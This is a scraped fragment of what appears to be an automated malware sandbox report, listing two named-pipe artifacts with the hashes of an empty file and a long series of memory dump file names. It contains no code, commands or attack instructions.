d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_1672_ZCDYKRYTHDHVHSUN
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/384-127-0x0000000000000000-mapping.dmp

Download
memory/384-75-0x0000000000000000-mapping.dmp

Download
memory/524-71-0x0000000000000000-mapping.dmp

Download
memory/560-123-0x0000000000000000-mapping.dmp

Download
memory/564-78-0x0000000000000000-mapping.dmp

Download
memory/576-103-0x000007FEFBF01000-0x000007FEFBF03000-memory.dmp

Filesize
8KB

Download
memory/584-129-0x0000000000000000-mapping.dmp

Download
memory/588-130-0x0000000000000000-mapping.dmp

Download
memory/588-70-0x0000000000000000-mapping.dmp

Download
memory/680-68-0x0000000000000000-mapping.dmp

Download
memory/772-79-0x0000000000000000-mapping.dmp

Download
memory/832-96-0x0000000000000000-mapping.dmp

Download
memory/860-137-0x0000000000000000-mapping.dmp

Download
memory/916-66-0x0000000000000000-mapping.dmp

Download
memory/948-59-0x0000000000000000-mapping.dmp

Download
memory/972-74-0x0000000000000000-mapping.dmp

Download
memory/984-109-0x0000000000000000-mapping.dmp

Download
memory/1044-55-0x0000000000000000-mapping.dmp

Download
memory/1088-107-0x0000000000000000-mapping.dmp

Download
memory/1092-135-0x0000000000000000-mapping.dmp

Download
memory/1104-67-0x0000000000000000-mapping.dmp

Download
memory/1108-93-0x0000000000000000-mapping.dmp

Download
memory/1124-80-0x0000000000000000-mapping.dmp

Download
memory/1128-131-0x0000000000000000-mapping.dmp

Download
memory/1184-91-0x0000000000000000-mapping.dmp

Download
memory/1200-143-0x0000000000000000-mapping.dmp

Download
memory/1236-76-0x0000000000000000-mapping.dmp

Download
memory/1260-128-0x0000000000000000-mapping.dmp

Download
memory/1280-136-0x0000000000000000-mapping.dmp

Download
memory/1280-98-0x0000000000000000-mapping.dmp

Download
memory/1280-58-0x0000000000000000-mapping.dmp

Download
memory/1296-72-0x0000000000000000-mapping.dmp

Download
memory/1324-64-0x0000000000000000-mapping.dmp

Download
memory/1376-101-0x0000000000000000-mapping.dmp

Download
memory/1396-81-0x0000000000000000-mapping.dmp

Download
memory/1416-73-0x0000000000000000-mapping.dmp

Download
memory/1464-65-0x0000000000000000-mapping.dmp

Download
memory/1472-125-0x0000000000000000-mapping.dmp

Download
memory/1472-100-0x0000000000000000-mapping.dmp

Download
memory/1516-113-0x0000000000000000-mapping.dmp

Download
memory/1520-61-0x0000000000000000-mapping.dmp

Download
memory/1524-126-0x0000000000000000-mapping.dmp

Download
memory/1536-62-0x0000000000000000-mapping.dmp

Download
memory/1548-95-0x0000000000000000-mapping.dmp

Download
memory/1580-108-0x0000000000000000-mapping.dmp

Download
memory/1584-77-0x0000000000000000-mapping.dmp

Download
memory/1620-99-0x0000000000000000-mapping.dmp

Download
memory/1664-56-0x0000000000000000-mapping.dmp

Download
memory/1680-69-0x0000000000000000-mapping.dmp

Download
memory/1696-134-0x0000000000000000-mapping.dmp

Download
memory/1752-87-0x0000000000000000-mapping.dmp

Download
memory/1780-110-0x0000000000000000-mapping.dmp

Download
memory/1780-85-0x0000000000000000-mapping.dmp

Download
memory/1792-102-0x0000000000000000-mapping.dmp

Download
memory/1800-115-0x0000000000000000-mapping.dmp

Download
memory/1924-60-0x0000000000000000-mapping.dmp

Download
memory/1928-112-0x0000000000000000-mapping.dmp

Download
memory/1944-138-0x0000000000000000-mapping.dmp

Download
memory/1948-124-0x0000000000000000-mapping.dmp

Download
memory/1952-119-0x0000000000000000-mapping.dmp

Download
memory/1960-132-0x0000000000000000-mapping.dmp

Download
memory/2008-111-0x0000000000000000-mapping.dmp

Download
memory/2024-122-0x0000000000000000-mapping.dmp

Download
memory/2044-97-0x0000000000000000-mapping.dmp

Download
memory/2044-54-0x0000000000000000-mapping.dmp

Download